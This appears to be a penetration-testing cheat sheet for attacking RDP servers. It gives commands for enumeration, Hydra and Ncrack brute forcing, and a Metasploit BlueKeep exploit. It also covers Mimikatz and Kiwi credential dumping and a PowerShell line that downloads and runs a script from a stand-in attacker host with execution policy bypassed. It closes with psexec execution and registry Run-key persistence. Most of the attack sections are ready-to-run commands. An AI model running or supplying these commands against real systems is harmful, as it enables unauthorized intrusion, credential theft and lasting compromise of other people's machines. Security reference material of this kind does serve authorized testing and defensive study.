Skip to main content

RDP (Remote Desktop Protocol)

Default Port: 3389

RDP (Remote Desktop Protocol) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. RDP allows remote access to the graphical desktop of a computer and is widely used for remote administration tasks.

RDP operates on a client-server model, where the client initiates a connection to the server to access the desktop environment and applications of the remote machine.

Connect

Connect Using Remote Desktop Connection

You can connect to an RDP server using the Remote Desktop Connection utility on Windows or through third-party clients on other operating systems.

mstsc /v:<target-ip>:<port>

Connect Using xfreerdp

xfreerdp is an open-source RDP client available for various platforms, including Linux.

xfreerdp /v:<target-ip>:<port>

Enumeration

Identifying an RDP Server

You can use Nmap to check if there's an RDP server running on a target host:

nmap -p 3389 <target-ip>

You can use Nmap to grab the RDP server's banner and find out its version:

nmap -p 3389 --script rdp-enum-encryption <target-ip>

Attack Vectors

Brute Forcing Credentials

Brute-forcing RDP credentials involves attempting various username and password combinations to gain unauthorized access to a system.

Tools like Hydra or Ncrack can be used for this purpose.

Brute Forcing with Hydra

hydra -t 1 -l <username> -P <password-list> rdp://<target-ip>

Brute Forcing with Ncrack

ncrack -U <username-list> -P <password-list> rdp://<target-ip>

Exploiting Vulnerabilities

BlueKeep (CVE-2019-0708)

If the target RDP service is running on a certain version of windows, it might be vulnerable to the Bluekeep vulnerability. We can use Metasploit to exploit:

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS TARGET_IP
set LHOST YOUR_IP
exploit

Post-Exploitation

Dumping Credentials

Dumping Credentials with Mimikatz

After gaining access, use Mimikatz to dump credentials and other critical information from memory.

Invoke-Mimikatz -DumpCreds

Dumping Credentials with Kiwi

Once you have an RDP session, you can use the kiwi extension to dump credentials from the memory:

meterpreter > load kiwi
meterpreter > creds_all

Remote Code Execution (RCE)

Once access is gained to an RDP server, you can execute arbitrary code on the target system, potentially leading to further compromise or data exfiltration.

powershell
Invoke-WebRequest -Uri http://attacker-server/malicious-script.ps1 -OutFile C:\temp\malicious-script.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\temp\malicious-script.ps1

Running a remote program on the RDP server:

psexec \\target-ip -u username -p password "cmd.exe /c \"C:\path\to\executable.exe\""

Persistence

Establishing persistence on the compromised system allows attackers to maintain access even after the initial compromise is remediated.

Tools like adding registry entries or creating scheduled tasks can be used for persistence on Windows systems.

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v <key-name> /t REG_SZ /d "<malicious-command>" /f